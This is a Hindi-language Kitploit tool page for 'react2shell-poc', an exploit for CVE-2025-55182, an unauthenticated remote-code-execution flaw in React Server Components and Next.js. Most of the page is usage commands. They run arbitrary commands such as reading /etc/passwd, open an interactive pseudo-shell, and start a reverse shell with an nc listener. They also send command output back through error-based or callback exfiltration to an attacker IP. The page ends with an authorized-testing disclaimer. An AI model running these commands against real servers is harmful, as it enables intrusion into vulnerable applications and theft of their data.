Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC - Critical RCE in React Server Components / Next.js. CVSS 10.0. Error-based exfil, reverse shell, interactive mode. | Kitploit
उपकरण/GitHubGitHub/p3ta00/react2shell-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access Tool
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC - Critical RCE in React Server Components / Next.js. CVSS 10.0. Error-based exfil, reverse shell, interactive mode.

रिपॉजिटरी देखें
912 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell - CVE-2025-55182 PoC

CVE-2025-55182 के लिए प्रूफ ऑफ कॉन्सेप्ट, React सर्वर कंपोनेंट्स में एक गंभीर बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता।

CVSS स्कोर: 10.0 (गंभीर)

भेद्यता

यह भेद्यता React के Flight प्रोटोकॉल डिसीरियलाइज़र में मौजूद है। विशेष रूप से तैयार पेलोड के माध्यम से प्रोटोटाइप प्रदूषण का शोषण करके, एक हमलावर कमजोर Next.js अनुप्रयोगों पर मनमाना कोड निष्पादन प्राप्त कर सकता है।

प्रभावित संस्करण

उत्पादभेद्यपैच
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

स्थापना

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

उपयोग

आउटपुट के साथ कमांड निष्पादन (डिफ़ॉल्ट - त्रुटि-आधारित एक्सफ़िल्ट्रेशन)

आउटपुट सीधे HTTP प्रतिक्रिया में NEXT_REDIRECT त्रुटि के माध्यम से लौटाया जाता है - कोई कॉलबैक सर्वर आवश्यक नहीं।

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

इंटरैक्टिव मोड

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

भेद्यता जांचें

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

ब्लाइंड RCE (कोई आउटपुट नहीं)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

रिवर्स शेल

root@kitploit:~
# Start listener
nc -lvnp 4444

# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

लीगेसी: कॉलबैक-आधारित एक्सफ़िल्ट्रेशन

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

विकल्प

root@kitploit:~
-t, --target       Target URL (required)
-c, --command      Command to execute (output via error-based exfil by default)
--check            Check if target is vulnerable
--blind            Blind RCE mode (no output capture)
--listen           Use callback server instead of error-based exfil
-i, --interactive  Interactive pseudo-shell mode
--revshell         Attempt reverse shell
--lhost            Attacker IP for callbacks/reverse shell
--lport            Callback port (default: 9999)
--callback         Manual callback URL
--timeout          Request timeout in seconds (default: 30)

यह कैसे काम करता है

डिफ़ॉल्ट एक्सफ़िल्ट्रेशन विधि NEXT_REDIRECT त्रुटि इंजेक्शन का उपयोग करती है:

  1. कमांड निष्पादित करें और आउटपुट कैप्चर करें
  2. digest फ़ील्ड में आउटपुट के साथ NEXT_REDIRECT त्रुटि फेंकें
  3. Next.js फ्लाइट प्रतिक्रिया में त्रुटि को क्रमबद्ध करता है
  4. आउटपुट सीधे HTTP प्रतिक्रिया बॉडी में दिखाई देता है

यह कॉलबैक-आधारित एक्सफ़िल्ट्रेशन की तुलना में अधिक विश्वसनीय है क्योंकि इसे लक्ष्य से आउटबाउंड नेटवर्क एक्सेस की आवश्यकता नहीं होती है।

संदर्भ

  • Wiz Security - React2Shell खुलासा
  • Datadog सुरक्षा लैब्स विश्लेषण
  • NVD - CVE-2025-55182

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

लेखक

p3ta

टूल डाउनलोड करें